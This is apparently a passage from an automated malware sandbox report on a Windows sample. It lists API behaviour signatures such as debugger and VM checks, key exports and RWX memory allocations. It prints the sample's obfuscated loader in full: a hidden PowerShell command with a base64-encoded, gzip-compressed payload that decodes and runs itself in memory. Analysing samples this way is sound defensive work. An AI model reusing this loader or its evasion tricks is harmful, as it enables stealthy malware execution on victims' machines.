1lOoDdDrh63mmt0ilArPB2bOj+f6REaqGPsbfh2Oh2yttdC+ucmJfPhyNSHQ1NH'+'o/b3G+NY9dTjyRT7+mRcp/PN9NKHubm1hueq1uy45J7PtwBcmyPsXYK{2}16o7/gpkjE9I/9TncR2{1}dY50kDHnN6jtzzbmg{2}H+1ajO0Zj1pxh15ztTVWuzQRNZGp+0PTQEcezpQ4ziW+PeUGtjl7uTz/3ZSh1P'+'2aFqtIYDf5reWd0E6d+tZZw789rWuTg86k7oOOBopKrjj8CKxYiGolFflpLpdNVJK+iHP0pbr/2EGm/1hx6OYh8zoAxU/iJ/TR6Z+0o+4DTVkOX0TbAmUUg'+'YNFFoswXnEWPcSTsJ'+'lHzoYXlnSR{1}dqJ'+'P59NqXIj0IKo8Nplg6OZmDi5BEGb2rXRJ6wq9odw1Ng86g3WnNLF3ef7{2}W3+zk3FolbS4pNA/mWWYeLNKVJ{2}u/HS54QwioZG8B9hZ2cPAaqg7UwbwSpAjqnLOn+OXXe'+'uDC{2}/QAthrcfJG+HnKWgIkDciOVRNpcnzbrEj67H0S/lTr7mubDP/fX1H'+'lc+8Xuu+ikVTJ8Xqw+X3'+'jSDn7f9SeYChC0oS4zkj8YXkNhnytPApxFBjJhtR/pO/oiEQd9eJll{1}eEfWhfCPcILA'+'AA{0}')-f'=','v','M')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
        2408

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
193.117.208.148	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 12, 2024, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 12, 2024, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 12, 2024, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:14 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 12, 2024, 9:14 a.m.			0	0
IsDebuggerPresent Aug. 12, 2024, 9:14 a.m.			0	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 12, 2024, 9:14 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 12, 2024, 9:14 a.m.	buffer: C:\Windows\system32\cmd.exe console_handle: 0x00000007	1	1
WriteConsoleW Aug. 12, 2024, 9:14 a.m.	buffer: /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASwBzAFAAYgAnACcAKwAnACcAVwBRAEMAQQA3AFYAVwArADIAKwBqAE8AQgBEACsALwBhAFQAOQBIADkAQQBxAFUAawBDAGIAQgB7ADEAfQBMAFkANwBVAE4AYQA2AFUAdwBvAEkAJwAnACsAJwAnAFcAMgBTAEoAcQBWADUAYgAzAFIAeQB3AFEARgB7ADEAfQBEAEUANwBCAE4ARQAzADMAOQBuACsALwBBAFUASQBmADEAMwBiAFYATwAyAGsAdABwAGMAWAAyAHoASABqADgAegBUAGMAegBYAGkAVwBoAEkAeQBnAFAAcABhAFIAWABrADMANQA4ACsARQBQAGEAagB3AEcATwBjAEMARABKAEoAYgBHAHIAVwA2AHcAaQBsAGEATABtADMAZAAyAGgAOAByAGgAZgA4AG8ALwB1AHAAYQArAFMAewAxAH0ARQBDAGIAagBjAEUARABUAHsAMgB9AFAAbAB5AFUAawByAGkAUwBJAFMAaQBuAHgAZQBiAFIATwBCADQAcABnAEUAMQA0AHkAUwBXAEYAYQBrAHsAMQB9ADYAVwBKAFQAeQBKAHkAYwBIAEgAOQBuAFQAaABDACsAaQBHAFYALwBxAHEAMgBHAGIALwBHAGIAQwArADIAYQAyAEgASABKADkASQBCAEMAdAAxADAAcgA4AHMAZABuAEwAcABXAHQAVABlAHsAMgB9AEMAcgBuADgANwBWAHQAWgBXAFIAegBVAGwAdABYAFQAbQB3AFMAegBXAEMANwBiAHUAMQBpAFEAbwBPAG8AeQBWAGwAYQBrAG4AMABwADYANABOAFYAdQBRACsAUgAnACcAKwAnACcAeQBqAHoAbwBSAGoALwBsAEsAVgBDAGMAMABiAE4AUwByAG8AegBEAEcASwA5AEkASABhADcAZQBrAFIANABUAFAAMwBiAGcAewAyAH0AJwAnACsAJwAnAGQAMwBtADgAVABVAFIARQBFAG8AWABaAHAAVgBJAHIAdQBZAHgAYwBoAHMAOQBCAHgAQgAnACcAKwAnACcAMwBrAHUAaABHAEoANAAzAEoARgBXAHEAVAAyAEYAOAB7ADEAfQBsAG4ALwBKAGkAZgAvAGgAbABFAGcAbwBhAGsARwBvAG4ARgBDAFQAaQBHADUAdABFAHQAOQBRAGgAYwBkAFgAJwAnACsAJwAnAEMAbwBjAHsAMQB9AEkASgBWAGsAdABRAGMAcwBXAEUAUQAyADkAcABhAEsAQQAyAEMAMQBmAEUANwBrAFUASgBnAHgAUQAvAFMAOQBtADUARAA3AFoARgB0AEMAOQBWADAAbAArAHEAZwBSAFMAQQB4AEUAcABGAFEAagBxAHkAMgB7ADEAfQAyAHUASgBzAHcAawBpAHUAVwBYAC8ARQB6ADUANABFAEMANAA0AEUATABBAE8ARABQAEYAewAyAH0ATgBWAHcAUwBEACsAKwBSAFUAQwBQAFMANABVAFkANQBIAHQARQBIAEIAWgBIAHsAMQB9AEMAWQBaAHEAcABmAEoAYQAwAGkAOQBlAEIAMABMAEgAaQAwAGcAMgBuAHAASwBrAHEASQBzAG4AdwBBAFgAQwByAHgAYQAyADUAWAAzAG0AdQB0AFYAcQBpAEMASQByAGwAaABzAEwASQBZAGMAKwBvAHUASAAvAFcAZgBoAGIAOABVACcAJwArACcAJwArAFAAZABEAFAANQBWADYAbQA4ADAARwBXAGQARwBRAEcATABzAFEAQgA5AFEAcABDAEMAdQAvAEYAaABXAHkAWQBpAFIARABwAEYAcQBJADkAYwBGAEQAdQBiAHoAZgBJAEsANQBCAEcAUABHAHcAUwBJAEYATwB5AGYARgBDADcAVABTAGcANABrAEYAWABUAHkAaAB6AFMAWQBRAGMAaQBHAHcAewAyAH0AWABrAEgAUQBsAGUAZgBPADUATABHAFQAeQA1ADIAdwBSAHcASwBBAEwANQA4AEQAVwAwAHMAcgBTAEIATgBTAFMATwA5AFQAWQAxAGUAYwBuAHMANQBCAHEATgB4AGkATwBJADQAcgAwAGkAQwBCAFAASABVAHEAawBrADAAdwBJADIANQBGAFEAbQBGAHsAMgB9ADkAMQBzAG8ARQBUAHoANwBMAEQAKwA2ADIAMAB1AFkAbwBBADYATwBSAFcARgB1AHEAZgB3AGIAegAvADIANQBMAFIANwBHAEkAawBvAGMAaQBDAHgAZwBjAEcAVgB7ADEAfQBpAEUAewAyAH0AeABTAHkAJwAnACsAJwAnAEcAcABTAEIAWgAxAGkAYgA2AHoAcQBWAGUAYwBYADMANABWAGsAQgBaAG0ARABCAEkASQBMAE4AMQBDAFEARwBBAGwAQgBjAEkAVwBLAFYAOABpAGMARABYAGoAaABsAEsAMQBpAGUAZwBFAEcAMABZAEMAawB7ADIAfQBrAEsAaAA4AG0AdwBCADIAVgBpAG4AeQBZAFoAdwBiAEIASAAzAFAASgBiAG4AaABiADUAawBKAHsAMgB9AC8AeABhAFkAQQA1AFkAbQBmAEUASABDAGIAYwBWACcAJwArACcAJwBHAFIAeABqAFEAUwBVAEkAZABTAG4ASQBGAGkALwA4AHUATABsAHcAVQBvAGQANgBjAFYAawBYADIAQQA1AEMATABMAEYAewAxAH0AcABPAHAASQBsAFEAdwBxAFAANQBhAFQATwBsADYAaAA2ACcAJwArACcAJwBtAEQASgBSAEkAQQBDAEIAbQB4AEEAewAyAH0AZAB4ACsAUgBMAHsAMgB9ADYAOAAzADgAawBmADEAZwBnADQAUQBqAEoAbABoADIAWgBTAHsAMgB9ADEANwBUAFcAMgBjAEsAewAxAH0AQgA3ADgAUgBiAFgAUwA0AGMAZQBpAGUAbgAzADIAMwAxAEoANwBUAGkAZwBkAHQAOAB3AGoAUgByAGIAZAAxAGoAewAxAH0AcgBJAGMAYwA5AGMAYwBtAHkARAAzAEoAQgBxAG4AUwBQAGsAdAByAHAARABpADUAcABiADAAOQBXAHUAawBEAFcAawBOAGMAKwBqAG0AagBjAGIASQBlAHsAMQB9AEsAZAA1AGcAMgB7ADIAfQBDAHoAVgBuAHMAVQBhADMAVgBxAFQAbgBtAFAAbwA5ADkAdAA2AEQASQBSAHQATgBxADIAcABoAGgAcQBOADUAawBWAEQAVwB3AE8AQQB7ADIAfQA5AEIAYgBJADcAYwBmADAATwAxAGQARgA3ADYAaABzAEYANQAwADkAVQA2AHMAYQB4ADEAMgBlAHQAYQA2AHsAMQB9AEoANwBVAHoAZgBtAEUAVwBXAHIAVAA5AEYAYwBUAEgAdAB0AGYAWgBvAGEAcQBxAHMAYwB1AE4AbgBvADcAaABIAFQAdQBOAG4AcQAnACcAKwAnACcANwBhAGUAMgBTAFgAMQBsAE8AbwBEAGQARAByAGgANgAzAG0AbQB0ADAAaQBsAEEAcgBQAEIAMgBiAE8AagArAGYANgBSAEUAYQBxAEcAUABzAGIAZgBoADIATwBoADIAeQB0AHQAZABDACsAdQBjAG0ASgBmAFAAaAB5AE4AUwBIAFEAMQBOAEgAJwAnACsAJwAnAG8ALwBiADMARwArAE4AWQA5AGQAVABqAHkAUgBUADcAKwBtAFIAYwBwAC8AUABOADkATgBLAEgAdQBiAG0AMQBoAHUAZQBxADEAdQB5ADQANQBKADcAUAB0AHcAQgBjAG0AeQBQAHMAWABZAEsAewAyAH0AMQA2AG8ANwAvAGcAcABrAGoARQA5AEkALwA5AFQAbgBjAFIAMgB7ADEAfQBkAFkANQAwAGsARABIAG4ATgA2AGoAdAB6AHoAYgBtAGcAewAyAH0ASAArADEAYQBqAE8AMABaAGoAMQBwAHgAaAAxADUAegB0AFQAVgBXAHUAegBRAFIATgBaAEcAcAArADAAUABUAFEARQBjAGUAegBwAFEANAB6AGkAVwArAFAAZQBVAEcAdABqAGwANwB1AFQAegAvADMAWgBTAGgAMQBQACcAJwArACcAJwAyAGEARgBxAHQASQBZAEQAZgA1AHIAZQBXAGQAMABFADYAZAArAHQAWgBaAHcANwA4ADkAcgBXAHUAVABnADgANgBrADcAbwBPAE8AQgBvAHAASwByAGoAagA4AEMASwB4AFkAaQBHAG8AbABGAGYAbABwAEwAcABkAE4AVgBKAEsAKwBpAEgAUAAwAHAAYgByAC8AMgBFAEcAbQAvADEAaAB4ADYATwBZAGgAOAB6AG8AQQB4AFUALwBpAEoALwBUAFIANgBaACsAMABvACsANABEAFQAVgBrAE8AWAAwAFQAYgBBAG0AVQBVAGcAJwAnACsAJwAnAFkATgBGAEYAbwBzAHcAWABuAEUAVwBQAGMAUwBUAHMASgAnACcAKwAnACcAbABIAHoAbwBZAFgAbABuAFMAUgB7ADEAfQBkAHEASgAnACcAKwAnACcAUAA1ADkATgBxAFgASQBqADAASQBLAG8AOABOAHAAbABnADYATwBaAG0ARABpADUAQgBFAEcAYgAyAHIAWABSAEoANgB3AHEAOQBvAGQAdwAxAE4AZwA4ADYAZwAzAFcAbgBOAEwARgAzAGUAZgA3AHsAMgB9AFcAMwArAHoAawAzAEYAbwBsAGIAUwA0AHAATgBBAC8AbQBXAFcAWQBlAEwATgBLAFYASgB7ADIAfQB1AC8ASABTADUANABRAHcAaQBvAFoARwA4AEIAOQBoAFoAMgBjAFAAQQBhAHEAZwA3AFUAdwBiAHcAUwBwAEEAagBxAG4ATABPAG4AKwBPAFgAWABlACcAJwArACcAJwB1AEQAQwB7ADIAfQAvAFEAQQB0AGgAcgBjAGYASgBHACsASABuAEsAVwBnAEkAawBEAGMAaQBPAFYAUgBOAHAAYwBuAHoAYgByAEUAagA2ADcASAAwAFMALwBsAFQAcgA3AG0AdQBiAEQAUAAvAGYAWAAxAEgAJwAnACsAJwAnAGwAYwArADgAWAB1AHUAKwBpAGsAVgBUAEoAOABYAHEAdwArAFgAMwAnACcAKwAnACcAagBTAEQAbgA3AGYAOQBTAGUAWQBDAGgAQwAwAG8AUwA0AHoAawBqADgAWQBYAGsATgBoAG4AeQB0AFAAQQBwAHgARgBCAGoASgBoAHQAUgAvAHAATwAvAG8AaQBFAFEAZAA5AGUASgBsAGwAewAxAH0AZQBFAGYAVwBoAGYAQwBQAGMASQBMAEEAJwAnACsAJwAnAEEAQQB7ADAAfQAnACcAKQAtAGYAJwAnAD0AJwAnACwAJwAnAHYAJwAnACwAJwAnAE0AJwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA= console_handle: 0x00000007	1	1
WriteConsoleW Aug. 12, 2024, 9:14 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 80 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8be8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8be8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8be8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a88e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8be8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8be8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8be8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8be8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8be8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8be8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8be8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a89a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a89a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a89a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a89a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a89a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a89a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a89a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a89a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a89a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a89a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a89a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a89a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a89a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a89a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8a28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a8a28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033eda0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033eee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033eee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033eee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033e6e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033e6e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033e6e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033e6e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033e6e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033e6e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 12, 2024, 9:14 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 278 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02780000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02781000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02782000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
